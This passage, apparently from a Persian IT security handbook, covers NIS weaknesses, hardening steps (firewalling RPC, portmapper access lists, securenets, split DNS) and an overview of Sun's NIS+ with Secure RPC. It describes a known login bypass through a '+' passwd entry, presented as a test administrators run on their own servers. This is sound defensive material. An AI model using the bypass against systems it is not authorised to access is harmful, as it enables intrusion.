‫ﻱ "‪ "+‬ﺑـﺮﺍﻱ ﻭﺭﻭﺩ ﺑـﻪ ﺳـﺮﻭﻳﺲﮔﻴﺮﻧـﺪﻩﻫـﺎ ﻭ‬
‫ﻳﻜﻲ ﺍﺯ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺭﺍﻫﻬـﺎ ﺑـﺮﺍﻱ ﺭﻭﻳـﺎﺭﻭﻳﻲ ﺑـﺎ ﺍﻳـﻦ ﺳـﺮﺩﺭﮔﻤﻲ‪ ،‬ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮ ﹺ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ NIS‬ﺍﺳﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻛﺎﺑﻞ ﺷﺒﻜﻪ ﺭﺍ ﺩﺭ ﺁﻭﺭﻳﺪ ﻭ ﺳﭙﺲ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺗﻼﺵ ﻛﻨﻴﺪ‪ ،‬ﺗﺎ ﺍﺗﻔـﺎﻗﻲ ﻛـﻪ‬
‫ﻫﻨﮕﺎﻡ ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﻮﺩﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ NIS‬ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪ ﻣﻲﺍﻓﺘﺪ ﺷﺒﻴﻪﺳﺎﺯﻱ ﺷﻮﺩ‪ .‬ﺩﺭ ﻫﺮ ﺩﻭ ﺣﺎﻟﺖ ﻧﺒﺎﻳﺪ ﺑﺘﻮﺍﻧﻴﺪ ﻓﻘﻂ ﺑﺎ ﺗﺎﻳﭗ ﻛـﺮﺩﻥ‬
‫"‪ "+‬ﺑﻌﻨﻮﺍﻥ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﻮﻳﺪ‪ .‬ﺍﻳﻦ ﺁﺯﻣﻮﻥ ﺑﻪ ﺷﻤﺎ ﺧﻮﺍﻫﺪ ﮔﻔﺖ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺪﺭﺳﺘﻲ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺪﻩ ﻳﺎ ﺧﻴﺮ‪.‬‬
‫ﺍﮔﺮ ﻧﺴﺨﺔ ﺟﺪﻳﺪﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺧﻮﺩ ﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﮔﻤﺎﻥ ﻧﻜﻨﻴﺪ ﻛﻪ ﺳﻴﺴﺘﻤﺘﺎﻥ ﻧـﺴﺒﺖ ﺑـﻪ ﺳـﺮﺩﺭﮔﻤﻲ ﺯﻳﺮﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ NIS‬ﺩﺭ‬
‫ﻗﺒﺎﻝ "‪ "+‬ﺍﻳﻤﻦ ﺍﺳﺖ‪ .‬ﺑﻄﻮﺭ ﺧﺎﺹ‪ ،‬ﺑﻌﻀﻲ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ‪ NIS‬ﺭﻭﻱ ‪ Linux‬ﻫﻢ ﺍﻳﻦ ﺍﺷﺘﺒﺎﻩ ﺭﺍ ﻣﺮﺗﻜﺐ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫‪ ۱۶۰‬ﺩﺭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ‪ Sun‬ﺍﺯ ‪ NIS‬ﻭ ﺷﺎﻳﺪ ﺑﻌﻀﻲ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﺩﻳﮕﺮ‪ ،‬ﺍﻳﻦ ﺧﻄﺮ ﻣﻲﺗﻮﺍﻧـﺪ ﺑـﺎ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺗﻐﻴﻴـﺮ ﻣﻘـﺎﺩﻳﺮ ‪ UID‬ﻭ ‪ GID‬ﺍﻗـﻼﻡ ‪ NIS‬ﻣﻮﺟـﻮﺩ ﺩﺭ ﻓﺎﻳـﻞ‬
‫‪ passwd‬ﺑﻪ ﺻﻔﺮ‪ ،‬ﻭ ﻳﺎ ﺳﺎﻳﺮ ﻣﻘﺎﺩﻳﺮ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﻠﻲ ﺑﻪ ﻧﻮﻋﻲ ﺍﺻﻼﺡ ﺷﻮﺩ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ‪ ،‬ﺗﺤﺖ ﺑﻌﻀﻲ ﻧﺴﺨﻪﻫﺎﻱ ‪ ،NIS‬ﺍﻳﻦ ﻗﻠﻢ ﺩﺍﺩﻩ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ "ﻓﺎﻳﻞ ﻧﮕﺎﺷﺖ ‪ passwd‬ﺭﺍ ﻭﺍﺭﺩ ﻛﻦ‪ ،‬ﺍﻣﺎ ﺗﻤـﺎﻡ ﺭﻣﺰﻫـﺎﻱ‬
‫ﻋﺒﻮﺭ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﻪ "‘" ﺗﻐﻴﻴﺮ ﺑﺪﻩ"‪ ،‬ﻭ ﺍﻳﻨﻜﺎﺭ ﻃﺒﻴﻌﺘﹰﺎ ﺍﺯ ﻭﺭﻭﺩ ﻫﺮ ﻛﺴﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﺮﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻭﺟﻮﺩ ﺍﻳـﻦ ﻗﻠـﻢ ﺩﺍﺩﻩ‬
‫ﻫﻢ ﺻﺤﻴﺢ ﻧﺒﻮﺩ!‬
‫‪٣٣٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺑﻬﺒﻮﺩ ﺍﻣﻨﻴﺖ ‪NIS‬‬
‫ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻱ ‪ NIS‬ﺷﺎﻣﻞ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺳﻲ ﺍﺳﺖ‪ .‬ﭼﻨﺪﻳﻦ ﺭﺍﻩ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻓﺸﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻃﻼﻋﺎﺕ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩﻫـﺎﻱ ‪NIS‬‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻣﺜﻞ ﺑﻴﺸﺘﺮ ﺑﻬﺒﻮﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﭼﻨﺪ ﻣﻮﺭﺩ ﺍﺯ ﺍﻳﻦ ﺭﻭﺷﻬﺎ ﺭﺍ ﺍﺩﻏﺎﻡ ﻛﻨﻴﺪ ﺗﺎ ﻳﻚ ﺭﻭﺵ ﺩﻓـﺎﻉ ﺩﺭ ﻋﻤـﻖ ﭼﻨـﺪ ﻻﻳـﻪ‬
‫‪١٦١‬‬
‫ﺑﺪﺳﺖ ﺁﻭﺭﻳﺪ‪:‬‬
‫‪.١‬‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻳﺎ ﺣﺪﺍﻗﻞ ﻳﻚ ﻣﺴﻴﺮﻳﺎﺏ ﻫﻮﺷﻤﻨﺪ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺧﻮﺩ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﺪ ﻭ ﺍﺟﺎﺯﻩ ﻧﺪﻫﻴﺪ ﺑﺴﺘﻪﻫﺎﻱ ‪ UDP‬ﻣﺮﺗﺒﻂ‬
‫ﺑﺎ ‪ RPC‬ﻣﻴﺎﻥ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﻭ ﺩﻧﻴﺎﻱ ﺑﻴﺮﻭﻧﻲ ﻣﺒﺎﺩﻟـﻪ ﺷـﻮﻧﺪ‪ .‬ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺑـﻪ ﺍﻳـﻦ ﻋﻠـﺖ ﻛـﻪ ‪ RPC‬ﺑـﺮ ﺍﺳـﺎﺱ ‪portmapper‬‬
‫ﭘﺎﻳﻪﺭﻳﺰﻱ ﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﭘﻮﺭﺕ ﻭﺍﻗﻌﻲ ‪ UDP‬ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ‪ ،‬ﻳﻚ ﭘـﻮﺭﺕ ﺛﺎﺑـﺖ ﻭ ﻣـﺸﺨﺺ ﻧﻴـﺴﺖ‪ .‬ﺩﺭ ﻋﻤـﻞ‪ ،‬ﺗﻨﻬـﺎ‬
‫ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻦ‪ ،‬ﺳﺪ ﻛﺮﺩﻥ ﺭﺍﻩ ﻫﻤﺔ ﺑﺴﺘﻪﻫﺎﻱ ‪ UDP‬ﺍﺳﺖ‪ ،‬ﺑﺠﺰ ﺁﻧﺪﺳﺘﻪ ﻛﻪ ﺧﻮﺩﺗﺎﻥ ﺑﺼﻮﺭﺕ ﺧﺎﺹ ﺍﺟﺎﺯﻩ ﺗﺒﺎﺩﻝ ﺁﻧﻬﺎ ﺭﺍ ﻣﻲﺩﻫﻴﺪ‪.‬‬
‫‪.٢‬‬
‫ﻧﺴﺨﻪﺍﻱ ﺍﺯ ‪ portmapper‬ﺭﺍ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎ )ﺑـﺮ ﺍﺳـﺎﺱ ﻧـﺎﻡ ﻣﻴﺰﺑـﺎﻥ ﻳـﺎ ﺁﺩﺭﺱ ‪ (IP‬ﻛـﻪ‬
‫ﺩﺳﺘﺮﺳﻲ ﺁﻧﻬﺎ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺧﺎﺹ ‪ RPC‬ﺑﺎﻳﺪ ﺗﺄﻳﻴﺪ ﻳﺎ ﺭﺩ ﺷﻮﺩ ﺗﻬﻴﻪ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﻧﺪﺍﺭﻳـﺪ ﻣﻬـﺎﺟﻢ ﻫﻤﭽﻨـﺎﻥ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺩﺧﺎﻟﺖ ‪ ،portmapper‬ﻭﺟﻮﺩ ﻫﺮﻳﻚ ﺍﺯ ﺧﺪﻣﺎﺕ ‪ RPC‬ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﮔﺮ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ‪ RPC‬ﺍﺑﺘـﺪﺍ‬
‫ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺑﺎ ‪ portmapper‬ﺗﻼﺵ ﻛﻨﻨﺪ‪ ،‬ﻳﻚ ﻧﺴﺨﺔ ﺑﻬﺒﻮﺩ ﻳﺎﻓﺘﺔ ‪ NIS‬ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺯﻣﻴﻨﺔ ﻭﻗﻮﻉ ﻳـﻚ ﺣﻤﻠـﺔ ﺑـﺎﻟﻘﻮﻩ‬
‫ﻫﺸﺪﺍﺭ ﺩﻫﺪ‪.‬‬
‫‪.٣‬‬
‫ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ‪ NIS‬ﺷﻤﺎ ﺍﺯ ﻓﺎﻳﻞ ‪ /var/yp/securenets‬ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ NIS‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻳﺎ ﻧﻪ‪ .‬ﺍﮔﺮ ﺍﻳـﻦ ﻓﺎﻳـﻞ‬
‫ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﺪ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺷﺒﻜﻪﻫﺎﻳﻲ ﻛﻪ ﻗﺎﺑﻠﻴﺖ ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺕ ‪ NIS‬ﺭﺍ ﺩﺍﺭﻧﺪ ﻣﺸﺨﺺ ﻛﻨﺪ‪ .‬ﻧﮕﺎﺭﺷـﻬﺎﻱ ﺩﻳﮕـﺮ‬
‫ﻻ ﺑﺮﺍﻱ ﻏﺮﺑﺎﻝ ﻛﺮﺩﻥ ﺁﺩﺭﺳﻬﺎﻳﻲ ﻛﻪ ﺩﺳﺘﺮﺳﻲ ﺁﻧﻬﺎ ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺧـﺎﺹ ‪ RPC‬ﺗﻮﺳـﻂ ‪ ypserve‬ﻣﺠـﺎﺯ‬
‫‪ NIS‬ﺍﺣﺘﻤﺎ ﹰ‬
‫ﺍﺳﺖ‪ ،‬ﺭﻭﺷﻬﺎﻱ ﺩﻳﮕﺮﻱ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫‪.٤‬‬
‫ﺁﻧﻘﺪﺭ ﺍﺯ ‪ NIS‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ ﻛﻪ ‪ DNS‬ﺍﺯ ﻳﺎﺩﺗﺎﻥ ﺑﺮﻭﺩ! ﺍﮔﺮ ﺑﻨﺎﻱ ﺷﻤﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻛـﺴﻲ ﺍﺯ ﺑﻴـﺮﻭﻥ ﻧﺘﻮﺍﻧـﺪ ﺁﺩﺭﺳـﻬﺎﻱ ‪ IP‬ﺍﺩﺍﺭﺓ‬
‫ﺷﻤﺎ ﺭﺍ ﺑﻔﻬﻤﺪ‪ ،‬ﺩﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ‪ ١٦٢‬ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻴﺪ ‪ -‬ﻳﻜﻲ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺍﺧﻠﻲ ﻭ ﺩﻳﮕﺮﻱ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺧﺎﺭﺟﻲ‪.‬‬
‫‪ NIS+‬ﺷﺮﻛﺖ ‪Sun‬‬
‫‪ NIS‬ﺑﺮﺍﻱ ﻣﺤﻴﻄﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﻭﺳﺘﺎﻧﻪ ﻭ ﻛﻮﭼﻚ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑـﻮﺩ‪ .‬ﻭﻗﺘـﻲ ﻣـﺸﺘﺮﻳﺎﻥ ﺷـﺮﻛﺖ ‪ Sun Microsystems‬ﺷـﺮﻭﻉ ﺑـﻪ‬
‫ﺳﺎﺧﺖ ﺷﺒﻜﻪﻫﺎﻳﻲ ﺑﺎ ﻫﺰﺍﺭﺍﻥ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺮﺩﻧﺪ‪ ،‬ﻣﻌﻠﻮﻡ ﺷﺪ ‪ NIS‬ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺷﺮﻛﺘﻬﺎﻱ ﺑـﺰﺭﮒ ﻏﻴﺮﻛـﺎﺭﺑﺮﺩﻱ ﻭ ﻧـﺎﺍﻣﻦ ﺍﺳـﺖ‪ .‬ﺩﺭ‬
‫ﺳﺎﻝ ‪ ۱۹۹۰‬ﺷﺮﻛﺖ ‪ Sun Microsystems‬ﺗﻬﻴﺔ ﻳﻚ ‪ NIS‬ﺟﺎﻳﮕﺰﻳﻦ ﺭﺍ ﺷﺮﻭﻉ ﻛﺮﺩ ﻭ ﭼﻨﺪ ﺳـﺎﻝ ﺑﻌـﺪ ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ ﺗﺤـﺖ ﻋﻨـﻮﺍﻥ‬
‫‪ NIS+‬ﻋﺮﺿﻪ ﺷﺪ‪.‬‬
‫ﻼ ﻣﻮﺭﺩ ﺁﺯﻣﻮﻥ ﻗﺮﺍﺭ ﻧﮕﺮﻓﺘـﻪ ﺑﻮﺩﻧـﺪ‪ ،‬ﭼﺮﺍﻛـﻪ ﺑـﻪ‬
‫‪ NIS+‬ﺑﺴﺮﻋﺖ ﺑﻪ ﺧﺮﺍﺏ ﺑﻮﺩﻥ ﺷﻬﺮﺕ ﻳﺎﻓﺖ ﻭ ﺑﻨﻈﺮ ﻣﻲﺭﺳﻴﺪ ﻧﺴﺨﻪﻫﺎﻱ ﺍﻭﻟﻴﻪ ﺁﻥ ﻋﻤ ﹰ‬
‫ﻧﺪﺭﺕ ﻃﺒﻖ ﺁﻧﭽﻪ ﻛﻪ ﻗﺮﺍﺭ ﺑﻮﺩ ﻋﻤﻞ ﻣﻲﻛﺮﺩﻧﺪ‪ .‬ﺍﺯ ﺍﻳﻦ ﮔﺬﺷﺘﻪ‪ ،‬ﺳﻨﺪﺑﺮﺩﺍﺭﻱ ﺁﻥ ﺑﺴﻴﺎﺭ ﮔﻴﺞﻛﻨﻨﺪﻩ ﻭ ﻧﺎﻗﺺ ﺑـﻮﺩ‪ .‬ﺩﺭ ﻧﻬﺎﻳـﺖ ‪ Sun‬ﻧﻘـﺎﻳﺺ‬
‫ﺁﻧﺮﺍ ﺭﻓﻊ ﻛﺮﺩ ﺑﻄﻮﺭﻳﻜﻪ ﺍﻣﺮﻭﺯ ‪ NIS+‬ﻳﻚ ﺳﻴﺴﺘﻢ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥﺗﺮ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻭ ﻛﻨﺘﺮﻝ ﺍﻳﻤﻦ ﺷﺒﻜﻪ ﺍﺳﺖ‪ .‬ﻳﻚ ﻣﺮﺟـﻊ ﻋـﺎﻟﻲ ﺑـﺮﺍﻱ‬
‫ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺯ ‪ NIS+‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻛﺘﺎﺏ ﻫﻤﻪ ﭼﻴﺰ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻫﺒﺮﻱ ‪ ١٦٣NIS+‬ﻧﻮﺷﺘﻪ ﺭﻳﻚ ﺭﻣﺰﻱ‪ ١٦٤‬ﺍﺳﺖ‪.‬‬
‫‪Layered Defense-in-Depth‬‬
‫‪Nameserver‬‬
‫)‪All About Administrating NIS+ (SunSoft Press, Prentice Hall, 1994‬‬
‫‪Rick Ramsey‬‬
‫‪161‬‬
‫‪162‬‬
‫‪163‬‬
‫‪164‬‬
‫‪٣٣٥‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﻛﺎﺭﻱ ﻛﻪ ‪ NIS+‬ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ‬
‫‪ NIS+‬ﺩﺭ ﺷﺒﻜﻪ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻳﻲ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺳـﺎﺯﻣﺎﻥ ﺑﻜـﺎﺭ ﻣـﻲﺭﻭﺩ‪ NIS+ .‬ﺍﻳـﻦ‬
‫ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎ ﺭﺍ "ﺟﺪﻭﻝ" ﻣﻲﻧﺎﻣﺪ‪ .‬ﺍﻳﻦ ﺟﺪﻭﻟﻬﺎ ﺍﺯ ﻧﻈﺮ ﻋﻤﻠﻜﺮﺩ ﻣﺸﺎﺑﻪ ﻧﮕﺎﺷﺘﻬﺎﻱ ‪ NIS‬ﻫﺴﺘﻨﺪ‪ .‬ﺑﺮ ﺧﻼﻑ ‪ NIS+ ،NIS‬ﺍﺯ ﻃﺮﻳﻖ ﺷـﺒﻜﻪ‬
‫ﺍﻣﻜﺎﻥ ﺍﺻﻼﺡ ﺍﻓﺰﺍﻳﺸﻲ‪ ١٦٥‬ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ‪.‬‬
‫ﻫﺮ ﺩﺍﻣﻨﺔ ‪ NIS+‬ﺩﻗﻴﻘﹰﺎ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ‪ ١٦٦NIS+‬ﺩﺍﺭﺩ‪ .‬ﺍﻳﻦ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺖ ﻛﻪ ﺣﺎﻭﻱ ﻧﺴﺨﺔ ﺍﺻﻠﻲ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ‬
‫ﺩﺍﻣﻨﺔ ﺍﺻﻠﻲ ‪ ١٦٧NIS+‬ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻜﺜﻴﺮ ﺷﻮﺩ‪ ،‬ﻛـﻪ ﺍﻳﻨﻜـﺎﺭ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ ﺣﺘـﻲ‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ﺧﺎﻣﻮﺵ ﺍﺳﺖ ﻳـﺎ ﺩﺭ ﺩﺳـﺘﺮﺱ ﻧﻴـﺴﺖ ﺷـﺒﻜﻪ ﻫﻤﭽﻨـﺎﻥ ﻗﺎﺑـﻞ ﺍﺳـﺘﻔﺎﺩﻩ ﺑﻤﺎﻧـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗـﻮﺍﻥ ﺍﺯ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ NIS+‬ﺑﺮﺍﻱ ﺯﻳﺮﺩﺍﻣﻨﻪﻫﺎ ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫ﻣﻮﺟﻮﺩﻳﺘﻬﺎﻳﻲ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ NIS+‬ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻨﺪ ﻣﻮﻛﻼﻥ ‪ ١٦٨NIS+‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻳﻚ ﻣﻮﻛـﻞ ‪ NIS+‬ﻣـﻲﺗﻮﺍﻧـﺪ ﻳـﻚ‬
‫ﻣﻴﺰﺑﺎﻥ ﻭ ﻳﺎ ﻳﻚ ﻛﺎﺭﺑﺮ ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ ﺷﺪﻩ ﺑﺎﺷﺪ‪ .‬ﻫﺮ ﻣﻮﻛﻞ ‪ NIS+‬ﻳﻚ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻭ ﻳﻚ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺩﺍﺭﺩ ﻛﻪ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ‬
‫‪ NIS+‬ﺩﺭ ﺩﺍﻣﻨﻪ ﺫﺧﻴﺮﻩ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﻛﻠﻴﺔ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻴﺎﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻭ ﻣﻮﻛﻼﻥ ‪ NIS+‬ﺍﺯ ﻃﺮﻳﻖ "‪ - "Secure RPC‬ﻧﺴﺨﻪﺍﻱ ﺍﺯ ‪ RPC‬ﻛﻪ ﻓﺮﺍﺧﻮﺍﻧﻴﻬﺎﻱ ﺗﻮﺍﺑـﻊ ﺭﺍ‬
‫ﺍﺯ ﻃﺮﻳﻖ ﺭﻣﺰﮔﺬﺍﺭﻱ ‪ DES‬ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻣﺤﺎﻓﻈﺖ ﻣﻲﻛﻨﺪ ‪ -‬ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻳﻨﻜﺎﺭ‪ ،‬ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ ﺍﺳـﺘﺮﺍﻕ ﺳـﻤﻊ ﻭ‬
‫ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﻣﻘﺎﻭﻡ ﻣﻲﺳﺎﺯﺩ‪ NIS+ .‬ﻫﻤﭽﻨﻴﻦ ﺑﺮ ﺳﺎﺧﺖ ﻭ ﻣﺪﻳﺮﻳﺖ ﻛﻠﻴﺪﻫﺎﻱ ‪ Secure RPC‬ﻧﻈﺎﺭﺕ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ‪،NIS+‬‬
‫ﻫﺮﻳﻚ ﺍﺯ ﺍﻋﻀﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻗﺎﺩﺭ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﺍﺯ ‪ Secure RPC‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪.‬‬
‫ﺟﺪﻭﻟﻬﺎﻱ ‪ NIS+‬ﻭ ﺳﺎﻳﺮ ﻧﻜﺎﺕ ﻣﺮﺑﻮﻃﻪ‬
‫ﻛﻠﻴﺔ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ NIS+‬ﺩﺭ ﻗﺎﻟﺐ ﺍﺷﻴﺎ‪ ١٦٩‬ﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﻧﺪ‪ NIS+ .‬ﺳﻪ ﮔﻮﻧﺔ ﺍﺳﺎﺳﻲ ﺍﺷـﻴﺎ ﺭﺍ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﻣﻲﻛﻨﺪ‪" .‬ﺟﺪﻭﻟﻬﺎ" ﺍﻃﻼﻋﺎﺕ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺭﺍ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻨﺪ‪" ،‬ﮔﺮﻭﻫﻬﺎ" ﺑﻪ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻣﻮﻛﻼﻥ ‪ NIS+‬ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﺑـﺮﺍﻱ ﺗـﺼﺪﻳﻖ‬
